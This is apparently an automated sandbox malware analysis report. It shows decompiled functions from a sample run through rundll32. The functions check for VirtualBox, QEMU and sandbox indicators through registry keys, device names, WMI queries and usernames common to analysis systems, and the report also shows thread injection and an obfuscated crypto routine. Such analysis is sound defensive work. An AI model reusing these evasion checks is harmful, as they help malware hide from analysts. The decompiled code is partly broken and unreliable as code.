                control_flow_graph 1019 215205cea60-215205cea8d call 215205d0410 1022 215205cece3-215205ceced 1019->1022 1023 215205cea93-215205cead3 SysAllocString * 2 1019->1023 1024 215205ceb2a-215205ceb32 1023->1024 1025 215205cead5-215205cead8 1023->1025 1028 215205ceb34-215205ceb37 SysFreeString 1024->1028 1029 215205ceb3d-215205ceb4a 1024->1029 1026 215205ceb21-215205ceb24 SysFreeString 1025->1026 1027 215205ceada-215205ceaf6 1025->1027 1026->1024 1034 215205ceb00-215205ceb02 1027->1034 1028->1029 1030 215205cecd3-215205cece2 1029->1030 1031 215205ceb50-215205ceb5f 1029->1031 1032 215205cecb3-215205ceccd CoUninitialize 1031->1032 1033 215205ceb65-215205ceb6f 1031->1033 1032->1030 1035 215205ceb70-215205ceb83 1033->1035 1034->1026 1036 215205ceb04-215205ceb1b CoUninitialize 1034->1036 1038 215205ceb89-215205ceb8d 1035->1038 1036->1026 1040 215205ceb93-215205cebb7 1038->1040 1041 215205cecaf 1038->1041 1046 215205cebb9-215205cebc1 1040->1046 1047 215205cebe8-215205cec0c 1040->1047 1041->1032 1046->1047 1048 215205cebc3-215205cebc5 1046->1048 1052 215205cec0e-215205cec16 1047->1052 1053 215205cec3d-215205cec61 1047->1053 1049 215205cebde-215205cebe2 VariantClear 1048->1049 1050 215205cebc7-215205cebda call 215205f9740 1048->1050 1049->1047 1050->1049 1052->1053 1055 215205cec18-215205cec1a 1052->1055 1061 215205cec92-215205cec9e 1053->1061 1062 215205cec63-215205cec6b 1053->1062 1057 215205cec33-215205cec37 VariantClear 1055->1057 1058 215205cec1c-215205cec2f call 215205f9740 1055->1058 1057->1053 1058->1057 1061->1041 1068 215205ceca0-215205ceca7 1061->1068 1062->1061 1064 215205cec6d-215205cec6f 1062->1064 1066 215205cec71-215205cec84 call 215205f9740 1064->1066 1067 215205cec88-215205cec8c VariantClear 1064->1067 1066->1067 1067->1061 1068->1035 1070 215205cecad 1068->1070 1070->1032
                C-Code - Quality: 21%
                			E00000215215205CEA60(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				intOrPtr _v72;
				signed int _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rbx;
				void* _t71;
				void* _t72;
				signed char _t78;
				signed char _t81;
				signed char _t84;
				void* _t94;
				void* _t128;
				intOrPtr* _t137;
				long long _t167;
				void* _t180;
				long long _t185;

				_t167 = __rsi;
				r15d = 0;
				_a32 = _t185;
				_v88 = _t185;
				_a24 = _t185;
				_t72 = E00000215215205D0410(_t71,  &_a32,  &_v88, __rsi); // executed
				if (_t72 == 0) goto 0x205cece3;
				_v32 = _t167;
				_v40 = __rdi;
				_v48 = __r12;
				_v56 = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0x205ceb2a;
				if (__rax == 0) goto 0x205ceb21;
				_v96 =  &_a24;
				_t13 = _t185 + 0x30; // 0x30
				r9d = _t13;
				_v104 = _t185;
				_t179 =  *_a32;
				if ( *((intOrPtr*)( *_a32 + 0xa0))() >= 0) goto 0x205ceb21;
				r14d = r15d;
				 *((intOrPtr*)( *_a32 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0x205ceb3d;
				__imp__#6();
				if (r14d == 0) goto 0x205cecd3;
				_t137 = _a24;
				_a16 = _t185;
				_a8 = r15d;
				if (_t137 == 0) goto 0x205cecb3;
				asm("o16 nop [eax+eax]");
				_v104 =  &_a8;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t137 + 0x20))();
				if (_a8 == r15d) goto 0x205cecaf;
				_v96 = _t185;
				r8d = 0;
				_v104 = _t185;
				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0x205cebe8;
				_t78 = _v80 & 0x0000ffff;
				if (_t78 == r12w) goto 0x205cebe8;
				if ((_t78 & 0x00000008) == 0) goto 0x205cebde;
				E00000215215205F9740(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
				_t92 =  !=  ? r12d : r15d;
				__imp__#9();
				_v96 = _t185;
				r8d = 0;
				_v104 = _t185;
				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0x205cec3d;
				_t81 = _v80 & 0x0000ffff;
				if (_t81 == r12w) goto 0x205cec3d;
				if ((_t81 & 0x00000008) == 0) goto 0x205cec33;
				E00000215215205F9740(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
				__imp__#9();
				_v96 = _t185;
				r8d = 0;
				_v104 = _t185;
				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0x205cec92;
				_t84 = _v80 & 0x0000ffff;
				if (_t84 == r12w) goto 0x205cec92;
				if ((_t84 & 0x00000008) == 0) goto 0x205cec88;
				E00000215215205F9740(_t128, _v72, L"VEN_VBOX", _v32, _t179, _t180);
				_t94 =  !=  ? r12d :  !=  ? r12d :  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *_a16 + 0x10))();
				if (_t94 != 0) goto 0x205cecaf;
				if (_a24 != 0) goto 0x205ceb70;
				goto 0x205cecb3;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_a32 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t94;
			}
























                0x215205cea60
                0x215205cea6c
                0x215205cea77
                0x215205cea7b
                0x215205cea82
                0x215205cea86
                0x215205cea8d
                0x215205cea93
                0x215205cea9f
                0x215205ceaa4
                0x215205ceaa9
                0x215205ceaae
                0x215205ceabe
                0x215205ceac4
                0x215205ceacd
                0x215205cead3
                0x215205cead8
                0x215205ceae2
                0x215205ceae7
                0x215205ceae7
                0x215205ceaee
                0x215205ceaf6
                0x215205ceb02
                0x215205ceb08
                0x215205ceb0e
                0x215205ceb18
                0x215205ceb1b
                0x215205ceb24
                0x215205ceb32
                0x215205ceb37
                0x215205ceb4a
                0x215205ceb50
                0x215205ceb54
                0x215205ceb58
                0x215205ceb5f
                0x215205ceb65
                0x215205ceb77
                0x215205ceb83
                0x215205ceb86
                0x215205ceb8d
                0x215205ceb9b
                0x215205ceba7
                0x215205cebaa
                0x215205cebb7
                0x215205cebb9
                0x215205cebc1
                0x215205cebc5
                0x215205cebd2
                0x215205cebda
                0x215205cebe2
                0x215205cebf0
                0x215205cebfc
                0x215205cebff
                0x215205cec0c
                0x215205cec0e
                0x215205cec16
                0x215205cec1a
                0x215205cec27
                0x215205cec2f
                0x215205cec37
                0x215205cec45
                0x215205cec51
                0x215205cec54
                0x215205cec61
                0x215205cec63
                0x215205cec6b
                0x215205cec6f
                0x215205cec7c
                0x215205cec84
                0x215205cec8c
                0x215205cec99
                0x215205cec9e
                0x215205ceca7
                0x215205cecad
                0x215205cecb6
                0x215205cecc0
                0x215205cecca
                0x215205ceccd
                0x215205cece2

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$ClearVariantwcsstr$AllocFreeUninitialize$Initialize
                • String ID: Caption$Name$PNPDeviceID$SELECT * FROM Win32_PnPDevice$VBOX$VEN_VBOX$WQL
                • API String ID: 2434920835-607120894
                • Opcode ID: 6f699076be4245c816bb30aee3a34d6a6e2db6215fc6f1578c029c3b824d234a
                • Instruction ID: d630e71c2f19afa0b317e0d4ce6714bc715c8daf857b11b7717ef7c3e073c3e0
                • Opcode Fuzzy Hash: 6f699076be4245c816bb30aee3a34d6a6e2db6215fc6f1578c029c3b824d234a
                • Instruction Fuzzy Hash: 30813677302F60C6EB209F25E8486ED77A0FB94B98F545156EE4A53B68DF38D885C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CF810 Relevance: 33.3, APIs: 1, Strings: 18, Instructions: 89COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1072 215205cf810-215205cf91f call 215205faeac 1075 215205cf921-215205cf931 GetUserNameW 1072->1075 1076 215205cf93b 1072->1076 1078 215205cf933-215205cf936 call 215205faea4 1075->1078 1079 215205cf959-215205cf975 1075->1079 1077 215205cf940-215205cf958 call 215205f59d0 1076->1077 1078->1076 1081 215205cf980-215205cf9ae call 215205cd1d0 call 215206019f0 1079->1081 1088 215205cf9b0-215205cf9b7 1081->1088 1089 215205cf9bb 1081->1089 1088->1081 1090 215205cf9b9 1088->1090 1091 215205cf9c0-215205cf9e2 call 215205faea4 1089->1091 1090->1091 1091->1077
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: NameUser
                • String ID: Checking if username matches : %s $CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sandbox$maltest$malware$milozs$sand box$test user$timmy$virus
                • API String ID: 2645101109-2358638013
                • Opcode ID: 2aec333ae91d2ab1eb2999078d7cb70e0cf30a0df4f06511f96c67f64b4f8555
                • Instruction ID: a3aece964244860fb90b21e88b1c70d0691e0ca3b2ed91fb438dc64279d5de4a
                • Opcode Fuzzy Hash: 2aec333ae91d2ab1eb2999078d7cb70e0cf30a0df4f06511f96c67f64b4f8555
                • Instruction Fuzzy Hash: BD41E836206F90D5EAB19B01F4883DA73E8FB98790FA00266DE8D07769EF78D549C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152058C180 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 76threadlibraryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Thread$AddressContextProc$AllocCreateCurrentHandleModuleProcessResumeVirtual
                • String ID: NtCreateThreadEx$RtlNewSecurityObjectWithMultipleInheritance$ntdll.dll
                • API String ID: 1751073527-1139882446
                • Opcode ID: f92ac50dcbe2c94af1dc0a0c71ddab170fda9b661e52f38cfeb8d8ca3d23f767
                • Instruction ID: 71c09c31650372074e981ecdcf0d15ff37a7f23e0965a8565a9d14914d14c173
                • Opcode Fuzzy Hash: f92ac50dcbe2c94af1dc0a0c71ddab170fda9b661e52f38cfeb8d8ca3d23f767
                • Instruction Fuzzy Hash: 29414B36202F60C6EB20CB11F84879A73A4FBE9B91F644155ED8983BA8DF7CD149CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CD380 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 65registryCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 57%
                			E00000215215205CD380(void* __eflags, signed int __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				void* _v8;
				signed int _v24;
				char _v536;
				long long _v552;
				long long _v560;
				long long _v568;
				long long _v576;
				long long _v584;
				long long _v592;
				long long _v600;
				long long _v608;
				long long _v616;
				char _v632;
				long long _v648;
				void* __rdi;
				long _t28;
				void* _t34;
				void* _t37;
				void* _t39;
				signed long long _t44;
				void* _t67;
				void* _t71;
				signed long long _t72;
				void* _t74;

				_a8 = __rbx;
				_a16 = __rsi;
				_t72 = _t71 - 0x2a0;
				_t44 =  *0x2067c720; // 0xca1645d940e
				_v24 = _t44 ^ _t72;
				_v616 = L"HARDWARE\\ACPI\\DSDT\\VBOX__";
				_v608 = L"HARDWARE\\ACPI\\FADT\\VBOX__";
				_v600 = L"HARDWARE\\ACPI\\RSDT\\VBOX__";
				_v592 = L"SOFTWARE\\Oracle\\VirtualBox Guest Additions";
				_v584 = L"SYSTEM\\ControlSet001\\Services\\VBoxGuest";
				_v576 = L"SYSTEM\\ControlSet001\\Services\\VBoxMouse";
				_v568 = L"SYSTEM\\ControlSet001\\Services\\VBoxService";
				_v560 = L"SYSTEM\\ControlSet001\\Services\\VBoxSF";
				_v552 = L"SYSTEM\\ControlSet001\\Services\\VBoxVideo";
				asm("o16 nop [eax+eax]");
				r8d = 0x200;
				E00000215215205F8EF0(_t34, 0, _t37, _t39,  &_v536, __rdx, _t67, _t74);
				E00000215215205CD1D0(_t34, L"SYSTEM\\ControlSet001\\Services\\VBoxVideo",  &_v536, __rdx, L"Checking reg key %s ",  *((intOrPtr*)(_t72 + 0x40 + __rbx * 8)));
				_v632 = __rsi;
				r9d = 0x20019;
				_v648 =  &_v632;
				r8d = 0;
				_t28 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
				if (_t28 == 0) goto 0x205cd48f;
				if (__rbx + 1 - 9 < 0) goto 0x205cd420;
				goto 0x205cd49f;
				RegCloseKey(??);
				return E00000215215205F59D0(_t34, _v24 ^ _t72,  *((intOrPtr*)(_t72 + 0x40 + __rbx * 8)),  *((intOrPtr*)(_t72 + 0x40 + __rbx * 8)));
			}



























                0x215205cd380
                0x215205cd385
                0x215205cd38b
                0x215205cd392
                0x215205cd39c
                0x215205cd3ad
                0x215205cd3bb
                0x215205cd3c7
                0x215205cd3d3
                0x215205cd3df
                0x215205cd3eb
                0x215205cd3f7
                0x215205cd403
                0x215205cd40f
                0x215205cd417
                0x215205cd42a
                0x215205cd430
                0x215205cd451
                0x215205cd45b
                0x215205cd460
                0x215205cd466
                0x215205cd46b
                0x215205cd478
                0x215205cd480
                0x215205cd489
                0x215205cd48d
                0x215205cd494
                0x215205cd4c3

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpen
                • String ID: Checking reg key %s $HARDWARE\ACPI\DSDT\VBOX__$HARDWARE\ACPI\FADT\VBOX__$HARDWARE\ACPI\RSDT\VBOX__$SOFTWARE\Oracle\VirtualBox Guest Additions$SYSTEM\ControlSet001\Services\VBoxGuest$SYSTEM\ControlSet001\Services\VBoxMouse$SYSTEM\ControlSet001\Services\VBoxSF$SYSTEM\ControlSet001\Services\VBoxService$SYSTEM\ControlSet001\Services\VBoxVideo
                • API String ID: 47109696-1723177289
                • Opcode ID: 7c6d4f493a34af7b555b709912d8c17efb4898b449d05045ffe067657bead6d7
                • Instruction ID: 6e3586046a2574ec3fa0946f8960d4da69914eb0e09d0904995cebeef8c49c13
                • Opcode Fuzzy Hash: 7c6d4f493a34af7b555b709912d8c17efb4898b449d05045ffe067657bead6d7
                • Instruction Fuzzy Hash: 9F31FA37216FA0D5EA608B11F4883DA73A8FBD8794F604266DE9D43B69DF38D154CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D0410 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94comCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Initialize$CreateInstanceSecurityUninitialize
                • String ID: ROOT\CIMV2
                • API String ID: 374467530-2786109267
                • Opcode ID: fe0e92e4dadc3a28f1dd3e5db6db49aa1143a83b0ab456d7d3ad11889142bd40
                • Instruction ID: 9d07d0e34ad82747307915cd88b137e93e88a0d67ef1ae40b549927bf617abac
                • Opcode Fuzzy Hash: fe0e92e4dadc3a28f1dd3e5db6db49aa1143a83b0ab456d7d3ad11889142bd40
                • Instruction Fuzzy Hash: 50414933709E61CAE7608F25F848B8A77A0FBD8B94F545155EE8A83B68DF38D1458B00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CCD00 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 248COMMON
                Download Yara Rule
                C-Code - Quality: 46%
                			E00000215215205CCD00() {
				void* _t1;
				void* _t4;
				void* _t5;
				void* _t7;

				_t1 = E00000215215205D0220(_t4, _t5, 0x20642210, _t7); // executed
				if (_t1 == 0) goto 0x205ccd1b;
				return 1;
			}







                0x215205ccd0b
                0x215205ccd12
                0x215205ccd1a

                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocProcess
                • String ID: VBoxTrayToolWnd$VBoxTrayToolWndClass$kernel32.dll$procexp64.exe$wine_get_unix_file_name
                • API String ID: 1617791916-1515944515
                • Opcode ID: c9e297c0423e2a758338a5ac1ce6d7f00fdea455dee43b4a0a241fd78c7a4ad5
                • Instruction ID: b5cfda7e5bd69a7682b46abb9dbf34b8c42df8e2c7c9a665e000cece1a4b840b
                • Opcode Fuzzy Hash: c9e297c0423e2a758338a5ac1ce6d7f00fdea455dee43b4a0a241fd78c7a4ad5
                • Instruction Fuzzy Hash: 1581E177353F3182FB6467755D897CA1586AFE4B90F0C12A9AE0AD72DEEE79C8010350
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CEEA0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 104COMMON
                Download Yara Rule
                C-Code - Quality: 46%
                			E00000215215205CEEA0(long long __rbx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				signed int _v24;
				char _v536;
				char _v1064;
				char _v1592;
				long long _v1608;
				long long _v1616;
				intOrPtr _v1624;
				void* __rdi;
				signed char _t30;
				void* _t33;
				void* _t40;
				void* _t43;
				signed long long _t50;
				void* _t65;
				void* _t70;
				void* _t77;
				void* _t80;
				void* _t83;

				_t83 = __r9;
				_a16 = __rbp;
				_a24 = __rsi;
				_t50 =  *0x2067c720; // 0xca1645d940e
				_v24 = _t50 ^ _t77 - 0x00000670;
				r8d = 0x208;
				E00000215215205F8EF0(_t33, 0, _t40, _t43,  &_v1592, _t65, _t70, _t80);
				_a8 = __rbx;
				_v1616 = L"qemu-ga";
				_v1608 = L"SPICE Guest Tools";
				asm("o16 nop [eax+eax]");
				r8d = 0x200;
				E00000215215205F8EF0(_t33, 0, 0, _t43,  &_v536, _t65, _t70, _t80);
				_v1624 = 0;
				if ( *0x2067e430 == 8) goto 0x205cefe9;
				if (1 - 0x1e < 0) goto 0x205cef31;
				r9d = 0;
				_t11 = _t83 + 0x26; // 0x26
				r8d = _t11;
				__imp__SHGetSpecialFolderPathW();
				__imp__PathCombineW();
				E00000215215205CD1D0(0, 0x2152067e460,  &_v536,  &_v1064, L"Checking QEMU directory %s ",  &_v1592);
				_t30 = GetFileAttributesW(??); // executed
				if (_t30 == 0xffffffff) goto 0x205cefad;
				if ((_t30 & 0x00000010) != 0) goto 0x205cf068;
				if (_t70 + 1 - 2 < 0) goto 0x205cef10;
				return E00000215215205F59D0(0, _v24 ^ _t77 - 0x00000670,  &_v1064,  &_v1592);
			}






















                0x215205ceea0
                0x215205ceea0
                0x215205ceea5
                0x215205ceeb2
                0x215205ceebc
                0x215205ceecb
                0x215205ceed1
                0x215205ceedd
                0x215205ceee5
                0x215205ceefa
                0x215205cef05
                0x215205cef1a
                0x215205cef20
                0x215205cef27
                0x215205cef34
                0x215205cef46
                0x215205cef48
                0x215205cef55
                0x215205cef55
                0x215205cef59
                0x215205cef71
                0x215205cef90
                0x215205cef9a
                0x215205cefa3
                0x215205cefa7
                0x215205cefb4
                0x215205cefe8

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Path$AttributesCombineCurrentEnvironmentExpandFileFolderProcessSpecialStrings
                • String ID: %ProgramW6432%$Checking QEMU directory %s $SPICE Guest Tools$qemu-ga
                • API String ID: 3908115579-2146621234
                • Opcode ID: 088ef6efb16eb6c2bb64d86321745261a28a4a8d70cfc7deaef236013a9aa593
                • Instruction ID: f65052a9a4e1675f2c69b9b383ba049123268e6494d42cb1308b20ce63c3768e
                • Opcode Fuzzy Hash: 088ef6efb16eb6c2bb64d86321745261a28a4a8d70cfc7deaef236013a9aa593
                • Instruction Fuzzy Hash: 52418D33316EA4C5EB308B14E4483DA6361FBE9B94F944266DE8E47AADDF38C545C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D0220 Relevance: 15.1, APIs: 10, Instructions: 74memoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Heap$Process$AdaptersAllocFreeInfo
                • String ID:
                • API String ID: 2824440793-0
                • Opcode ID: 9c061581dfea897cd26754b9f8105845bc69f0a82cb52782afe093cfc218019c
                • Instruction ID: 89a4b15d684a1e71950738d7d95504469941a08ab34dcb6e54c683ca571d8d74
                • Opcode Fuzzy Hash: 9c061581dfea897cd26754b9f8105845bc69f0a82cb52782afe093cfc218019c
                • Instruction Fuzzy Hash: 6231C43370BEA0C6EA648B16A41C3A967A1EFE9BC0F1850A5EE490375CEE3CD5858700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CD870 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 60fileCOMMON
                Download Yara Rule
                C-Code - Quality: 55%
                			E00000215215205CD870(void* __eflags, signed int __rbx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				signed int _v24;
				char _v536;
				long long _v552;
				long long _v560;
				long long _v568;
				long long _v576;
				long long _v584;
				long long _v600;
				intOrPtr _v608;
				intOrPtr _v616;
				void* __rdi;
				void* _t32;
				void* _t36;
				void* _t38;
				signed long long _t43;
				long long _t49;
				void* _t59;
				void* _t66;
				signed long long _t67;
				void* _t69;
				void* _t71;

				_t71 = __r9;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t67 = _t66 - 0x280;
				_t43 =  *0x2067c720; // 0xca1645d940e
				_v24 = _t43 ^ _t67;
				_v584 = L"\\\\.\\VBoxMiniRdrDN";
				_v576 = L"\\\\.\\VBoxGuest";
				_v568 = L"\\\\.\\pipe\\VBoxMiniRdDN";
				_v560 = L"\\\\.\\VBoxTrayIPC";
				_t49 = L"\\\\.\\pipe\\VBoxTrayIPC";
				_v552 = _t49;
				_t60 =  *((intOrPtr*)(_t67 + 0x40 + __rbx * 8));
				r9d = 0;
				_v600 = __rbp;
				_v608 = 0x80;
				_v616 = 3;
				_t16 = _t71 + 1; // 0x1, executed
				r8d = _t16;
				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
				r8d = 0x200;
				E00000215215205F8EF0(_t32, 0, _t36, _t38,  &_v536, _t59,  *((intOrPtr*)(_t67 + 0x40 + __rbx * 8)), _t69);
				E00000215215205CD1D0(_t32, _t49,  &_v536, _t59, L"Checking device %s ",  *((intOrPtr*)(_t67 + 0x40 + __rbx * 8)));
				if (_t49 != 0xffffffff) goto 0x205cd950;
				if (__rbx + 1 - 5 < 0) goto 0x205cd8e0;
				goto 0x205cd95e;
				CloseHandle(??);
				return E00000215215205F59D0(_t32, _v24 ^ _t67, _t59, _t60);
			}

























                0x215205cd870
                0x215205cd870
                0x215205cd875
                0x215205cd87a
                0x215205cd880
                0x215205cd887
                0x215205cd891
                0x215205cd8a2
                0x215205cd8b0
                0x215205cd8bc
                0x215205cd8c8
                0x215205cd8cd
                0x215205cd8d4
                0x215205cd8e0
                0x215205cd8e5
                0x215205cd8e8
                0x215205cd8f2
                0x215205cd8fd
                0x215205cd905
                0x215205cd905
                0x215205cd909
                0x215205cd916
                0x215205cd91f
                0x215205cd938
                0x215205cd941
                0x215205cd94a
                0x215205cd94e
                0x215205cd953
                0x215205cd986

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateFileHandle
                • String ID: Checking device %s $\\.\VBoxGuest$\\.\VBoxMiniRdrDN$\\.\VBoxTrayIPC$\\.\pipe\VBoxMiniRdDN$\\.\pipe\VBoxTrayIPC
                • API String ID: 3498533004-4225997269
                • Opcode ID: c9cc4e11c399b33a74f671cb02cb25218be533300bb4ec664d672f236775e40b
                • Instruction ID: 2b3de9c4f6169f743b2b9024edc1782cd643ca93a65f199fc9c3b22269fc0441
                • Opcode Fuzzy Hash: c9cc4e11c399b33a74f671cb02cb25218be533300bb4ec664d672f236775e40b
                • Instruction Fuzzy Hash: 47213E36206F90C6E7608F11F4583CA73A4FBD87A0F6042A6DE9947BA8DF39D545CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F9C34 Relevance: 12.9, APIs: 5, Strings: 2, Instructions: 661COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 71%
                			E00007FFA7FFA535F9C34() {
				void* _t348;
				signed char _t364;
				void* _t366;
				intOrPtr _t367;
				void* _t369;
				void* _t371;
				void* _t373;
				void* _t374;
				void* _t375;
				signed int _t377;
				void* _t378;
				signed int _t379;
				signed int _t386;
				signed long long _t419;
				signed long long _t423;
				signed long long _t458;
				intOrPtr* _t461;
				intOrPtr* _t462;
				intOrPtr* _t468;
				intOrPtr _t475;
				signed int* _t489;
				signed long long _t501;
				intOrPtr* _t506;
				intOrPtr* _t508;
				long long _t514;
				signed long long _t516;
				signed long long _t518;
				long long _t520;
				signed long long _t526;
				void* _t588;
				intOrPtr _t599;
				signed long long _t624;
				signed long long _t631;
				void* _t632;
				void* _t633;
				void* _t635;
				intOrPtr _t642;
				void* _t644;
				void* _t650;
				signed long long _t651;
				signed long long _t653;
				signed long long _t654;

				 *((long long*)(_t632 + 8)) = _t514;
				_push(_t651);
				_t633 = _t632 - 0x70;
				_t631 = _t518;
				 *((long long*)(_t633 + 0x60)) = _t588 - 0x94;
				r14d = _t635 + 0x956;
				r10d = _t644 - 0x1582;
				 *((long long*)(_t633 + 0xb8)) = _t588 - 0x40c;
				 *((long long*)(_t633 + 0xc8)) =  *(_t633 + 0xe0) + 0x761;
				r11d = _t588 - 0x15fd;
				_t624 = _t588 - 0x54f;
				_t520 =  *((intOrPtr*)(_t633 + 0xf8)) + 0xffffe932;
				 *(_t633 + 0xe0) = _t624;
				r9d = r9d + 0xfffffd9e;
				 *((long long*)(_t633 + 0xc0)) = _t520;
				r8d = r10d;
				 *((intOrPtr*)(_t633 + 0x50)) = r11d;
				_t516 =  *((intOrPtr*)(_t633 + 0xe8)) - 0xfec;
				 *(_t633 + 0x5c) = r9d;
				 *(_t633 + 0x64) = _t516;
				 *((long long*)(_t633 + 0xe8)) = _t588 - 0xe8;
				r15d = _t588 - 0x176;
				_t348 = _t653 - 0x70;
				r13d = _t588 - 0x2a8;
				if (r11d == _t348) goto 0x535fa66f;
				 *((intOrPtr*)(_t520 - 0x41)) =  *((intOrPtr*)(_t520 - 0x41)) + _t348;
				asm("lodsd");
				asm("adc al, [eax]");
				 *((intOrPtr*)(_t624 + 0x1355)) =  *((intOrPtr*)(_t624 + 0x1355)) + dil;
				r12d = 0x1b47bb000015fd;
				if (r13d - _t348 < 0) goto 0x535f9efc;
				_t33 = _t516 - 0x70; // 0x1ad7
				r9d = _t33;
				r8d = 0x1fda;
				 *((long long*)(_t633 + 0x40)) = 0x535fc300;
				 *((char*)(_t633 + 0x38)) = 0x93;
				 *((char*)(_t633 + 0x30)) = 0x2d;
				 *(_t633 + 0x28) = 5;
				 *(_t633 + 0x20) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x110)) + 0x68)) - 0x12e2;
				E00007FFA7FFA535E23C8(r15d, _t386, _t516, _t631);
				 *(_t631 + 0x45c) = 0x535fc300;
				_t41 = _t516 + 0x60; // 0x1ba7
				r9d = _t41;
				r8d = 0x145c;
				 *(_t631 + 0x1b8) = 0x535fc300;
				 *((long long*)(_t633 + 0x40)) = 0x53603760;
				 *((char*)(_t633 + 0x38)) = 0xf9;
				 *((char*)(_t633 + 0x30)) = 0x4a;
				 *(_t633 + 0x28) =  *((intOrPtr*)(_t631 + 0x70)) - 0x1482;
				 *(_t633 + 0x20) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x160)) + 0x1b0)) + 0x6a446;
				_t526 = _t631;
				E00007FFA7FFA535E23C8(r15d, _t386, _t516, _t526);
				 *(_t631 + 0x45c) = 0x53603760;
				_t52 = _t516 + 0x60; // 0x1ba7
				r9d = _t52;
				r8d = _t377;
				 *(_t631 + 0x1b8) = 0x53603760;
